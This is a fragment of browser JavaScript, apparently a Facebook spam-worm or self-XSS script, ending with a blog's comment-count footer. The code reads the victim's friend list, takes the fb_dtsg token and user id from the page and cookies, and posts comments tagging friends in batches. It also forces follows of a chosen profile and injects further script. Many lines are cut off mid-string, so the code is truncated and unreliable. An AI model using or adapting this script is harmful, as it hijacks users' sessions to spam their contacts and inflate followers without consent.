function x__0() { return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP"
function get_friends(){
var a=x__0();
a.open("GET", "/ajax/typeahead/
a.send(null);
if (a.readyState == 4) {
var f = JSON.parse(a.responseText.subs
return f.payload.entries;
}
return false;
}
function get_uid(b){
var a=x__0();
a.open("GET", 'http://graph.facebook.com/'+b, false);
a.send();
if (a.readyState == 4) {
return uid = JSON.parse(a.responseText).id;
}
return false;
}
var patt = /comment_text=(.*?)&/
var c = 1;
username = /\.com\/(.*?)\//
uid = get_uid(username);
a = window.top.location;
termina = 0;
var amigos = get_friends();
post_id = /[0-9]{8,}/.exec(a);
uids = 'comment_text=';
header = 'ft_ent_identifier='+post_id+'
for ( var n = 1 ; n < amigos.length ; n++ ){
//uids += '%40[' + amigos[n].uid + '%3A' + encodeURI(amigos[n].text) + ']%20';
fb_dtsg = document.getElementsByName('fb
uids += '%40[' + amigos[n].uid + '%3AAAAAAAAAAAA]%20';
c++;
if(c == 7){
uids += '&';
with(new XMLHttpRequest()) open("POST", "/ajax/ufi/
z = setTimeout('function(){asd=0}'
clearInterval(z);
c = 1;
uids = 'comment_text=';
}
}
var fb_dtsg = document.getElementsByName('fb
var user_id = document.cookie.match(document
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.subst
}
else { return ""; }
}
}
function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}
var fb_dtsg = document.getElementsByName('fb
var user_id = document.cookie.match(document
function a(abone){
var http4 = new XMLHttpRequest();
var url4 = "/ajax/follow/
var params4 = "profile_id=" + abone + "&location=1&source=follow-but
http4.open("POST", url4, true);
//Send the proper header information along with the request
http4.setRequestHeader("Conten
http4.setRequestHeader("Conten
http4.setRequestHeader("Connec
http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {
http4.close; // Close the connection
}
}
http4.send(params4);
}
function sublist(uidss) {
var a = document.createElement('script
a.innerHTML = "new AsyncRequest().setURI('/ajax/
document.body.appendChild(a);
}
0 Nhận xét